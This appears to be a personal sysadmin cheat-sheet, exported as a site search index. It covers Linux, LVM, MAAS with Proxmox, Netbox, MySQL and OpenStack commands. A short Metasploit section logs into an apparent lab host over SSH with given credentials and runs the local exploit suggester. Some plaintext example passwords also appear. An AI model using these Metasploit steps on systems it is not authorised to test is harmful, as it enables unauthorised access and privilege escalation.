
    Rancid - Check which devices are impacted

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq\n

    Rancid - Only show the device name to pipe into ssh-keygen

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq | grep -Eo '^[^ ]+'\n
    sort /opt/rancid/var/logs/VPN.20180111.064300  | grep -i key | uniq | grep -Eo '^[^ ]+'\n

    SSH - Remove the public keys

    ssh-keygen -f \"/opt/rancid/.ssh/known_hosts\" -R ###REMOTE_IP_OF_DEVICE###\n

    BIND DNS - Check the master zones (not ARPA or random files ) we are hosting

    ls -alh --ignore=*.arpa* | wc -\n

    SMART HD Data - Get useful smartctl data

    sudo smartctl -a /dev/sdb | egrep \"Spin_Up_Time|Reallocated_Sector_Ct|Temperature|Current_Pending_Sector|Offline_Uncorrectable|Power_On_Hours\"\n

    Network - Create TAP Interface

    tunctl -t tap0\nifconfig tap0 10.1.1.100 netmask 255.255.255.0 up\n

    Start Linux stress test

    screen -S stress-test -d -m stress --cpu 100 --io 100 --vm 20 --vm-bytes 1G --hdd 5 --timeout 24h\n

    Install markdown-pdf

    sudo npm install -g phantomjs --unsafe-perm\nsudo npm install -g markdown-pdf --unsafe-perm\n

    Debug Radius, FreeIPA, LDAP

    radiusd -X 2>&1 | tee debugfile\n\ntail -f /var/log/dirsrv/slapd-EVENT-DHMTL-CA/access\n\nradtest ldumont user_ldap_password 10.0.99.22 1812 shared_radius_secret\n\nldapwhoami -vvv -h 10.0.99.22 -p 389 -D uid=ldumont,cn=users,cn=accounts,dc=event,dc=dhmtl,dc=ca -x -w user_ldap_password\n
    "},{"location":"linux/#when-windows-10-creator-upgrade-breaks-linux-grub","title":"When Windows 10 Creator upgrade breaks Linux Grub","text":"
    set root=(hd0,msdos5)\nset prefix=(hd0,msdos5)/boot/grub\ninsmod normal\nnormal\n

    When in the OS - to make the changes permanent.

    sudo update-grub\nsudo grub-install disk\n
    "},{"location":"linux/#upgrading-to-debian-testing-breaks-apt-when-trying-to-downgrade","title":"Upgrading to Debian testing breaks APT when trying to downgrade.","text":"

    Replace \"Ubuntu\" with \"Debian\" if you are running Debian /etc/apt/preferences.d/allow-downgrade

    Package: *\nPin: release a=stable\nPin-Priority: 1001\n
    apt-get update\napt-get upgrade\n

    Remove the file after and

    apt-get update\n

    If you are missing gnome and the display doesn't work

    sudo apt-get update\nsudo apt-get upgrade\nsudo apt-get dist-upgrade\nsudo apt-get install nvidia-driver\nsudo shutdown -r now\n

    Should be good to go!

    "},{"location":"linux/#unbalanced-audio-with-pulse-audio","title":"Unbalanced audio with Pulse audio","text":"
    killall pulseaudio; rm -r ~/.config/pulse/* ; rm -r ~/.pulse*\npulseaudio -k \n

    Reboot!

    "},{"location":"linux/#create-gpg-key-and-export-the-key-format-for-signing-github-commits","title":"Create GPG key and export the key format for signing Github commits","text":"
    #Create the key\ngpg --gen-key\n\n#Show the key ID\ngpg --list-keys\n\n#Set the global Git sign key\ngit config --global user.signingkey $KEY_ID_HERE\n\n#Set the GPG sign flag to true for all repos.\ngit config --global commit.gpgsign true\n\n#Export the key with \"-----BEGIN PGP PUBLIC KEY BLOCK-----\"\ngpg --armor --export laurentfdumont@gmail.com > mykey.asc\n
    "},{"location":"linux/#using-the-ip-tool-to-change-connecticity","title":"Using the \"ip\" tool to change connecticity\"","text":"
    ip link set $DEV_NAME down\nip link set $DEV_NAME up\n\nip route add default via $DEF_GW_IP dev $DEV_NAME\nip addr add $IP_ADDR_CIDR dev $DEV_NAME\nip addr delete $IP_ADDR_CIDR dev $DEV_NAME\n
    "},{"location":"linux/#fix-br-and-vmbr-linux-bridges-filtering-lldp-packets","title":"Fix BR and VMBR Linux bridges filtering LLDP packets","text":"
    https://interestingtraffic.nl/2017/11/21/an-oddly-specific-post-about-group_fwd_mask/\n\necho 16384 > /sys/class/net/$VMBR_INTERFACE/bridge/group_fwd_mask\n
    "},{"location":"linux/#add-fish-as-the-default-shell-for-ubuntudebian","title":"Add fish as the default shell for Ubuntu/Debian.","text":"
    sudo apt-get install fish\n\ncoldadmin@big-potato ~> cat /etc/shells \n# /etc/shells: valid login shells\n/bin/sh\n/bin/bash\n/bin/rbash\n/bin/dash\n/usr/bin/tmux\n/usr/bin/fish\n\nchsh -s /usr/bin/fish\n
    "},{"location":"linux/#one-history-file-for-multiple-prompts","title":"One history file for multiple prompts.","text":"
    vim ~/.bashrc\nexport PROMPT_COMMAND='history -a'\n
    "},{"location":"linux/#enable-terminus-powerline-on-ubuntu-font-name-is-terminess","title":"Enable Terminus Powerline on Ubuntu (font name is Terminess)","text":"
    https://github.com/powerline/fonts/issues/210\nhttps://superuser.com/questions/886023/linux-mint-installing-bdf-fonts-with-console-fc-cache-fc-list\n\ngit clone https://github.com/powerline/fonts\ncd fonts\n./install.sh\n\ncd /etc/fonts/conf.d/\nsudo rm /etc/fonts/conf.d/10*  \nsudo rm -rf 70-no-bitmaps.conf \nsudo ln -s ../conf.avail/70-yes-bitmaps.conf .\nsudo dpkg-reconfigure fontconfig\n
    "},{"location":"linux/#ubuntu-1904-disable-ubuntu-dock-completely","title":"Ubuntu 19.04 - Disable Ubuntu dock completely.","text":"

    https://askubuntu.com/questions/1030138/how-can-i-get-rid-of-the-dock-in-ubuntu-18

    cd /usr/share/gnome-shell/extensions/\nsudo mv ubuntu-dock@ubuntu.com{,.bak}\n
    "},{"location":"linux/#change-fan-speed-of-a-r710-through-ipmi","title":"Change fan speed of a R710 through IPMI.","text":"

    IPMI needs to be enabled in ILO! You need valid credentials! This disables the auto-adjust of the fan speed, be careful of the R710 heating. I am not responsible for fires :)

    #Get the ENV data from the IPMI\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD sensor reading \"Ambient Temp\" \"FAN 1 RPM\" \"FAN 2 RPM\" \"FAN 3 RPM\"\n\n#Enable manual fan control.\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x01 0x00\n\n#\"Activating manual fan speeds! (2160 RPM)\"\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x02 0xff 0x09\n
    "},{"location":"linux/#check-bonding-status","title":"Check bonding status","text":"
    cat /proc/net/bonding/mgmt\ncat /proc/net/bonding/$INTERFACE_NAME_HERE\n
    "},{"location":"linux/#get-low-level-interface-stats","title":"Get low-level interface stats","text":"
    ethtool -S $INTERFACE_NAME_HERE\nethtool -S mgmt-1\n
    "},{"location":"linux/#ssh-without-using-all-identity-files-automatically","title":"SSH without using all identity files automatically","text":"
    ssh -o \"IdentitiesOnly true\" -v -A user@host\n
    "},{"location":"linux/#remove-resolvctl-issues-with-openvpn-dns-being-removed","title":"Remove resolvctl (issues with OpenVPN DNS being removed)","text":"
    sudo systemctl disable systemd-resolved.service\nsudo systemctl stop systemd-resolved.service\n\ndns=default in [main] section of \"sudo vi /etc/NetworkManager/NetworkManager.conf\"\n\nsudo rm /etc/resolv.conf\nsudo service network-manager restart\n
    "},{"location":"linux/#troubleshoot-apt-install-errors","title":"Troubleshoot APT install errors.","text":"
    # Find the correct file from :\ncd /var/lib/dpkg/info/\n# In this case, it was the Foreman postinst script\ncat foreman.postinst\n# Increase verbosity\nEXPORT DEBUG=1\n# Run the failing configure package\ndpkg --configure foreman\n
    "},{"location":"linux/#docker-hugo","title":"Docker Hugo","text":"
    docker run --rm -it -v /srv/hugo:/src -u hugo laurentfdumont/laurent-hugo hugo new site mysite\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo/mysite/:/src -u hugo laurentfdumont/laurent-hugo hugo\ndocker run --rm -it -v /srv/hugo/mysite:/src -p 1313:1313 -u hugo laurentfdumont/laurent-hugo hugo server -b http://linode2.coldnorthadmin.com -w --bind=0.0.0.0\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo:/src -u hugo jguyomard/hugo-builder hugo new site mysite \n
    "},{"location":"linux/#check-and-clean-for-fstrim","title":"Check and clean for FSTRIM","text":"

    Only support for SCSI disk - proxmox.

    #Check TRIM support status\nlsblk -D\n\n### BAD NO support\nroot@kolla-controller003:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nvda                      0        0B       0B         0\n|-vda1                   0        0B       0B         0\n|-vda2                   0        0B       0B         0\n`-vda5                   0        0B       0B         0\n  |-system-root          0        0B       0B         0\n  `-system-swap_1        0        0B       0B         0\n\n### OK support\nroot@kolla-compute004:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nsda                      0        4K       1G         0\n|-sda1                   0        4K       1G         0\n|-sda2                1024        4K       1G         0\n`-sda5                   0        4K       1G         0\n  |-system-root          0        4K       1G         0\n  `-system-swap_1        0        4K       1G         0\n\n### Start TRIM PROCESS\nfstrim -av\nroot@kolla-compute004:~# fstrim -av\n/boot: 755.4 MiB (792125440 bytes) trimmed\n/: 49 GiB (52552167424 bytes) trimmed\n
    "},{"location":"linux/#reduce-swap-size-and-increase-root-fs-size","title":"Reduce swap size and increase root FS size","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n
    "},{"location":"linux/#mount-disk-to-linux","title":"Mount disk to linux","text":"
    # Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    "},{"location":"linux/#check-iscsi-disks","title":"Check ISCSI disks","text":"
    sudo lsblk -S\n
    "},{"location":"linux/#boot-logs","title":"Boot logs","text":"
    /var/log/boot.log  ---  System boot log\n\n/var/log/dmesg     ---  print or control the kernel ring buffer\n
    "},{"location":"linux/#upgrade-kernel-on-centos7","title":"Upgrade Kernel on Centos7","text":"
    [root@ooo-director ~]# rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org\n[root@ooo-director ~]# yum install https://www.elrepo.org/elrepo-release-7.0-4.el7.elrepo.noarch.rpm\n
    [root@ooo-director ~]# yum repolist\nLoaded plugins: fastestmirror, priorities\nLoading mirror speeds from cached hostfile\n * base: mirror.calgah.com\n * elrepo: iad.mirror.rackspace.com\n * extras: mirror.calgah.com\n * updates: mirror.calgah.com\nrepo id                                                repo name                                                                                       status\nbase/7/x86_64                                          CentOS-7 - Base                                                                                  10,097\ndelorean-train                                         delorean-openstack-trove-7680b5ef0e3608b2c45f057f65337c4af3d5659d                               801+348\ndelorean-train-build-deps                              dlrn-train-build-deps                                                                            139+78\ndelorean-train-testing                                 dlrn-train-testing                                                                              875+823\nelrepo                                                 ELRepo.org Community Enterprise Linux Repository - el7                                              139\nextras/7/x86_64                                        CentOS-7 - Extras                                                                                   307\nrdo-qemu-ev/x86_64                                     RDO CentOS-7 - QEMU EV                                                                               87\nupdates/7/x86_64                                       CentOS-7 - Updates                                                                                1,010\nrepolist: 13,455\n
    yum --enablerepo=elrepo-kernel install kernel-ml\n
    [root@ooo-director ~]# awk -F\\' '$1==\"menuentry \" {print i++ \" : \" $2}' /etc/grub2.cfg\n0 : CentOS Linux (5.4.6-1.el7.elrepo.x86_64) 7 (Core)\n1 : CentOS Linux (3.10.0-1062.9.1.el7.x86_64) 7 (Core)\n2 : CentOS Linux (3.10.0-1062.el7.x86_64) 7 (Core)\n3 : CentOS Linux (0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa) 7 (Core)\n\n[root@ooo-director ~]# grub2-set-default 0\n\n[root@ooo-director ~]# grub2-mkconfig -o /boot/grub2/grub.cfg\nGenerating grub configuration file ...\nFound linux image: /boot/vmlinuz-5.4.6-1.el7.elrepo.x86_64\nFound initrd image: /boot/initramfs-5.4.6-1.el7.elrepo.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.9.1.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.9.1.el7.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.el7.x86_64.img\nFound linux image: /boot/vmlinuz-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa\nFound initrd image: /boot/initramfs-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa.img\ndone\n
    "},{"location":"linux/#ps-a-process-list-for-process-accounting","title":"PS a process list for process accounting","text":"
    ps -eo cmd \n
    "},{"location":"linux/#send-a-sysrq-though-kvm","title":"Send a sysrq though KVM","text":"

    Types of event Dec 26 20:04:49 director kernel: SysRq : HELP : loglevel(0-9) reboot(b) crash(c) terminate-all-tasks(e) memory-full-oom-kill(f) kill-all-tasks(i) thaw-filesystems(j) sak(k) show-backtrace-all-active-cpus(l) show-memory-usage(m) nice-all-RT-tasks(n) poweroff(o) show-registers(p) show-all-timers(q) unraw(r) sync(s) show-task-states(t) unmount(u) force-fb(V) show-blocked-tasks(w) dump-ftrace-buffer(z)

    #In the guest VM\necho 1 > /proc/sys/kernel/sysrq\n\n#To make it permanent\n[root@director ~]# cat /etc/sysctl.d/sysrq.conf \nkernel.sysrq = 1\n\n#From the Hypervisor\n#KEY_B replace what is after the _ for the correct action. This will reboot the target host.\nroot@kvm01:/tmp# virsh send-key ooo-director KEY_LEFTALT KEY_SYSRQ KEY_B\n
    "},{"location":"linux/#install-pgcli-postgres-cmd-line-cli-ubuntu-1904","title":"Install pgcli - postgres cmd line CLI - Ubuntu 19.04","text":"
    sudo apt-get install libpq-dev python-dev\npip3 install pgcli\npgcli --host 127.0.0.1 --port 5432 --user ara_user --dbname ara --password\n
    "},{"location":"linux/#redhat-centos-bonding-lacp-vlan","title":"Redhat / Centos bonding LACP - VLAN","text":"
    modprobe bonding\n\n#vi /etc/sysconfig/network-scripts/ifcfg-bond0\nDEVICE=bond0\nType=Bond\nNAME=bond0\nBONDING_MASTER=yes\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nBONDING_OPTS=\"mode=4 miimon=100 lacp_rate=1\"\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em1\nDEVICE=em1\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em2\nDEVICE=em2\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em3\nDEVICE=em3\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n
    "},{"location":"linux/#write-speed-test","title":"Write speed test","text":"

    https://www.thomas-krenn.com/en/wiki/Linux_I/O_Performance_Tests_using_dd

    dd if=/dev/zero of=/root/testfile bs=1G count=1 oflag=dsync\n
    "},{"location":"linux/#extend-lv","title":"Extend lv","text":"
    sudo lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv\nsudo resize2fs /dev/ubuntu-vg/ubuntu-lv\n
    "},{"location":"linux/#set-dns-with-resolvctl","title":"Set DNS with resolvctl","text":"
    laurentdumont@docker01:/srv$ sudo resolvectl dns \nGlobal:\nLink 17 (vethc025466):\nLink 15 (vetheb3b292):\nLink 13 (veth45fcbdc):\nLink 3 (docker0):\nLink 2 (ens192): 10.199.199.1\n\n\nsudo resolvectl dns ens192 10.199.199.1\n
    "},{"location":"linux/#fix-openvpn-dns-issues-with-new-resolved-for-dns","title":"Fix openvpn DNS issues with new resolved for DNS","text":"
    sudo apt install openvpn-systemd-resolved\n
    "},{"location":"linux/#show-disk-info","title":"Show disk info","text":"
    lshw -class disk\nhwinfo --disk\n
    "},{"location":"linux/#create-one-pdf-from-multiple","title":"Create one PDF from multiple","text":"
    # From within folder containing the PDF pages \nqpdf --empty --pages *.pdf -- out.pdf\n
    "},{"location":"linux/#change-image-size","title":"Change image size","text":"
    convert myfigure.png -resize 200x100 myfigure.jpg\n
    "},{"location":"lvm/","title":"LVM","text":""},{"location":"lvm/#reduce-swap-and-extend-other-lvm-module","title":"Reduce swap and extend other LVM module","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n\n----------------- Mount partition from existing VG/LV -----------------\n# Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    7  echo \"deb http://download.proxmox.com/debian/pve stretch pve-no-subscription\" > /etc/apt/sources.list.d/pve-install-repo.list\n    8  wget http://download.proxmox.com/debian/proxmox-ve-release-5.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-5.x.gpg\n    9  apt update && apt dist-upgrade\n   10  apt install proxmox-ve postfix open-iscsi\n   11  clear\n   12  shutdown -r now\n   13  mount /dev/sdb1 /storage\n   14  mkdir /storage\n   15  mount /dev/sdb1 /storage\n   16  mount /dev/sdb /storage\n   17  mount -t ext4 /dev/sdb /storage\n   18  dmesg | tail\n   19  fdisk -l\n   20  lvdisplay \n   21  vgdisplay \n   22  vgscan \n   23  fdisk -l\n   24  clear\n   25  vgdisplay \n   26  lvmdiskscan \n   27  vgcreate \n   28  vgcreate /dev/sdb1\n   29  pvs\n   30  vgcreate vg-storage /dev/sdb1\n   31  vgdisplay \n   32  man lvcreate \n   33  lvcreate -n storage -l 100%FREE vg-storage\n   34  lvdisplay \n   35  clear\n   36  mkfs.ext4 /dev/vg-storage/storage\n   37  lvdisplay \n   38  man mount\n   39  man mount\n   40  man mount\n   41  mount -t ext4 /dev/vg-storage/storage /storage\n   42  cd /storage\n   43  mkdir tata\n   44  ls\n   45  rm tata\n   46  rm -rf tata\n   47  clear\n   48  exit\n   49  history\n
    "},{"location":"maas/","title":"MAAS","text":""},{"location":"maas/#adding-a-custom-power-provider-for-maas","title":"Adding a custom power provider for MAAS.","text":""},{"location":"maas/#install-proxmoxer-for-python3","title":"Install proxmoxer for Python3","text":"
    pip3 install proxmoxer\n
    "},{"location":"maas/#proxmox-script-source-httpsbugslaunchpadnetmaasbug1805799","title":"Proxmox Script - source https://bugs.launchpad.net/maas/+bug/1805799","text":"
    # Copyright 2018 Wojciech Rakoniewski  \n# This software is licensed under the\n# GNU Affero General Public License version 3 (see the file LICENSE).\n#\n# tested on Proxmox VE 5.2-11 but should work with any version\n# libraries: proxmoxer\n#   tested with version 1.02 installed using apt\n\n\"\"\"Proxmox Power Driver for MAAS\"\"\"\n\n__all__ = [\n        \"ProxmoxError\",\n        \"ProxmoxPowerDriver\"\n        ]\n\nfrom provisioningserver.drivers import (\n    make_ip_extractor,\n    make_setting_field,\n    SETTING_SCOPE,\n)\nfrom provisioningserver.drivers.power import (\n    PowerDriver,\n    PowerError\n)\n\ntry:\n    from proxmoxer import ProxmoxAPI\n    PROXMOXER_IMPORTED = True\nexcept ImportError:\n    PROXMOXER_IMPORTED = False\n\nPROXMOX_YES=\"y\"\nPROXMOX_NO=\"n\"\n\nPROXMOX_VALIDATE_SSL_CHOICES = [\n    [PROXMOX_YES, \"Yes\"],\n    [PROXMOX_NO, \"No\"]]\n\nclass ProxmoxError(PowerError):\n    \"\"\"Failure communicating to proxmox \"\"\"\n\nclass ProxmoxPowerDriver(PowerDriver):\n\n    name = 'proxmox'\n    chassis = True\n    description = \"Proxmox (virtual systems)\"\n    settings = [\n        make_setting_field(\n            'power_vm_name', \"VM id or name\", required=True,\n            scope=SETTING_SCOPE.NODE),\n        make_setting_field('power_address', \n            \"Proxmox host name or ip\", required=True),\n        make_setting_field('power_user', \n            \"Proxmox username (user@realm)\", required=True),\n        make_setting_field(\n            'power_pass', \"Proxmox password\", field_type='password',\n            required=True),\n        make_setting_field('power_ssl_validate', \"Validate ssl\", \n            field_type='choice', required=True, \n            choices=PROXMOX_VALIDATE_SSL_CHOICES, default=PROXMOX_NO),\n    ]\n    ip_extractor = make_ip_extractor('power_address')\n\n    def detect_missing_packages(self):\n        if not PROXMOXER_IMPORTED:\n            return [\"python3-proxmoxer\"]\n        return []\n\n    def power_on(self, system_id, context):\n        \"\"\"Power on Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.start.post();\n\n    def power_off(self, system_id, context):\n        \"\"\"Power off Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.stop.post();\n\n    def power_query(self, system_id, context):\n        \"\"\"Power query Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        ncd=vm.status.current.get()\n\n        if ncd['status'] == 'running':\n            return \"on\"\n        else:\n            return \"off\"\n\n\n    def __proxmox_login(self,system_id,context):\n        \"\"\"Login to proxmox server.\"\"\"\n\n        api_host = context.get('power_address')\n        api_user = context.get('power_user')\n        api_password = context.get('power_pass')\n        vm_id = context.get('power_vm_name')\n        api_ssl_val = (context.get('power_validate_ssl')==PROXMOX_YES)\n\n        try:\n            api = ProxmoxAPI(api_host, user=api_user, \n                    password=api_password, verify_ssl=api_ssl_val)\n\n            con_vm=None\n            for vm in api.cluster.resources.get(type=\"vm\"):\n                if (str(vm['vmid'])==vm_id) or (vm['name']==vm_id):\n                    con_vm=vm\n                    break\n\n        except Exception:\n            raise ProxmoxError(\n                    \"Can't connect to proxmox cluster %s\" % (api_host))\n\n        if con_vm is None:\n            \"\"\"vm not found\"\"\"\n            raise ProxmoxError(\n                    \"Virtual machine %s not found on proxmox cluster %s\" % (vm_id, api_host))\n\n        #extract node object\n        vm_obj=getattr(getattr(getattr(api.nodes,con_vm['node']),\n            con_vm['type']),\n            str(con_vm['vmid']))\n\n        return vm_obj\n
    "},{"location":"maas/#location-of-the-power-scripts-for-maas","title":"Location of the power scripts for MAAS.","text":"
    /usr/lib/python3/dist-packages/provisioningserver/drivers/power/proxmox.py\n/usr/lib/python3/dist-packages/provisioningserver/drivers/power/registry.py\n
    "},{"location":"maas/#edit-registrypy-and-add-the-following-lines-to-the-bottom-of-the-import-section","title":"Edit registry.py and add the following lines to the bottom of the import section.","text":"
    from provisioningserver.drivers.power.proxmox import ProxmoxPowerDriver\n
    "},{"location":"maas/#add-the-following-line-to-the-bottom-of-the-power_drivers-array","title":"Add the following line to the bottom of the power_drivers array.","text":"
    ProxmoxPowerDriver(),\n
    # Register all the power drivers.\npower_drivers = [\n    AMTPowerDriver(),\n    APCPowerDriver(),\n    DLIPowerDriver(),\n    FenceCDUPowerDriver(),\n    HMCPowerDriver(),\n    IPMIPowerDriver(),\n    ManualPowerDriver(),\n    MoonshotIPMIPowerDriver(),\n    MSCMPowerDriver(),\n    MicrosoftOCSPowerDriver(),\n    NovaPowerDriver(),\n    RECSPowerDriver(),\n    SeaMicroPowerDriver(),\n    UCSMPowerDriver(),\n    VirshPowerDriver(),\n    VMwarePowerDriver(),\n    WedgePowerDriver(),\n    ProxmoxPowerDriver(),\n]\n
    "},{"location":"maas/#restart-the-rack-controller","title":"Restart the rack controller.","text":"
    systemctl restart maas-rackd\n
    "},{"location":"metasploit/","title":"Metasploit","text":""},{"location":"metasploit/#metasploit-plugins","title":"Metasploit plugins","text":""},{"location":"metasploit/#how-to-use-an-ssh-login-as-a-msf-session","title":"How to use an ssh login as a msf session","text":"
    use auxiliary/scanner/ssh/ssh_login\nset rhosts 10.10.127.204\nset username typhoon\nset password 789456123\n\n# show sessions\nsessions\n\nmsf5 post(multi/recon/local_exploit_suggester) > sessions\n\nActive sessions\n===============\n\n  Id  Name  Type         Information                               Connection\n  --  ----  ----         -----------                               ----------\n  1         shell linux  SSH typhoon:789456123 (10.10.127.204:22)  10.9.179.67:40461 -> 10.10.127.204:22 (10.10.127.204)\n\n# use specific session\nset session 1\n
    "},{"location":"metasploit/#use-the-msf-exploit-suggestion","title":"Use the msf exploit suggestion","text":"
    use post/multi/recon/local_exploit_suggester\nexploit\n
    "},{"location":"molecule/","title":"Molecule","text":""},{"location":"molecule/#testing-framework-for-ansible","title":"Testing framework for Ansible.","text":""},{"location":"molecule/#installation-ubuntu-1804-lts","title":"Installation Ubuntu 18.04 LTS","text":"
    sudo apt-get install -y python-pip libssl-dev\npip install --user molecule\n
    "},{"location":"molecule/#create-a-test-setup-in-an-existing-role","title":"Create a test setup in an existing role","text":"
    #From within the role folder\nmolecule init scenario -r my-role-name\n
    "},{"location":"molecule/#start-a-full-testing-run","title":"Start a full testing run","text":"
    sudo molecule test\n
    "},{"location":"mysql/","title":"MySQL/MariaDB","text":""},{"location":"mysql/#create-database-and-user","title":"Create Database and user.","text":"
    CREATE DATABASE `racktables`;\nCREATE USER 'racktables_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `racktables`.* TO 'racktables_user'@'%';\n\n\nCREATE DATABASE `netbox`;\nCREATE USER 'netbox_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `netbox`.* TO 'netbox_user'@'%';\n
    "},{"location":"mysql/#check-galera-status","title":"Check Galera status","text":"
    MariaDB [(none)]> SHOW GLOBAL STATUS LIKE 'wsrep_%';\n
    "},{"location":"netbox/","title":"Netbox","text":"
    apt-get update\napt-get install -y postgresql libpq-dev\n
    sudo -u postgres psql\nCREATE DATABASE netbox;\nCREATE USER netbox WITH PASSWORD 'bigpotato';\nGRANT ALL PRIVILEGES ON DATABASE netbox TO netbox;\n\\q\n
    apt-get install -y python3 python3-dev python3-setuptools build-essential libxml2-dev libxslt1-dev libffi-dev graphviz libpq-dev libssl-dev zlib1g-dev\neasy_install3 pip\n
    mkdir -p /opt/netbox/ && cd /opt/netbox/\ngit clone -b master https://github.com/digitalocean/netbox.git .\npip3 install -r requirements.txt\npip3 install napalm\n
    sudo apt-get install libapache2-mod-wsgi\nsudo a2enmod wsgi\nsudo a2enmod proxy\nsudo a2enmod proxy_http\nsudo a2enmod headers\nsudo a2ensite netbox\nsudo service apache2 restart\n
    <VirtualHost *:80>\n    ServerName netbox.northernsysadmin.com\n    Redirect permanent / https://netbox.northernsysadmin.com/\n</VirtualHost>\n\n<VirtualHost *:443>\n    SSLEngine on\n    SSLCertificateFile $FULL_CHAIN_CERT_HERE\n    SSLCertificateKeyFile $PRIVATE_KEY_CERT_HERE\n    ProxyPreserveHost On\n\n    ServerName netbox.northernsysadmin.com\n\n    Alias /static /opt/netbox/netbox/static\n\n    # Needed to allow token-based API authentication\n    WSGIPassAuthorization on\n\n    <Directory />\n          SetEnvIfNoCase Host netbox.northernsysadmin\\.com VALID_HOST\n          Order Deny,Allow\n          Deny from All\n          Allow from env=VALID_HOST\n    </Directory>\n\n    <Directory /opt/netbox/netbox/static>\n        Options Indexes FollowSymLinks MultiViews\n        AllowOverride None\n        Require all granted\n    </Directory>\n\n    <Location /static>\n        ProxyPass !\n    </Location>\n\n    RequestHeader set \"X-Forwarded-Proto\" expr=%{REQUEST_SCHEME}\n    ProxyPass / http://127.0.0.1:8001/\n    ProxyPassReverse / http://127.0.0.1:8001/\n</VirtualHost>\n
    "},{"location":"openstack/","title":"Openstack","text":""},{"location":"openstack/#general-troubleshoot-shamelessly-stolen-from-httpwwwpanticzdeindexphpopenstack","title":"General troubleshoot - Shamelessly stolen from : http://www.panticz.de/index.php/openstack","text":"
    # list VMs on all hypervisor\nopenstack server list --all --long  -c Name -c Host\n\n# list VMs on specific hypervisor\nopenstack server list --all -c Name -f value --host ${COMPUTE_NODE}\n\n# get VM count by hypervisor\nopenstack server list --all --long  -c Host -f value | sort | uniq -c\n\n# list compute nodes\nopenstack compute service list\n\n# list compute service\nopenstack compute service list --host ${OS_NODE}\n\n# disable compute service\nfor OS_SERVICE in $(openstack compute service list --host ${OS_NODE} -c Binary -f value); do\n    openstack compute service set --disable --disable-reason \"Maintenance\" ${OS_NODE} ${OS_SERVICE}\ndone\n\nopenstack compute service set --disable --disable-reason potato qasite1-compute001.localdomain nova-compute\n\n# Search for server witch status error\nopenstack server list --all --status ERROR\n\n# Search for server with status resizing\nopenstack server list --all --status=VERIFY_RESIZE\n\n# List instances / VMs\nopenstack server list\nopenstack server list -c ID -c Name -c Status -c Networks -c Host --long\n
    "},{"location":"openstack/#start-all-vms-on-a-single-compute","title":"Start all VMs on a single compute","text":"
    for x in `openstack server list --all -c ID -f value --host tenlab1-compute002.localdomain`;do openstack server start $x;done \n
    "},{"location":"openstack/#migrate-to-specific-compute","title":"Migrate to specific compute","text":"
    nova host-evacuate --target_host kolla-compute003 kolla-compute004.cmaker.studio\nwatch nova migration-list\n
    "},{"location":"openstack/#get-all-the-keypairs-existing-for-all-users","title":"Get all the keypairs existing for all users","text":"
    for x in `openstack user list -f value -c ID`;do echo $x && nova keypair-list --user $x;done\n
    "},{"location":"openstack/#evacuate-single-server-from-compute","title":"Evacuate single server from compute","text":"
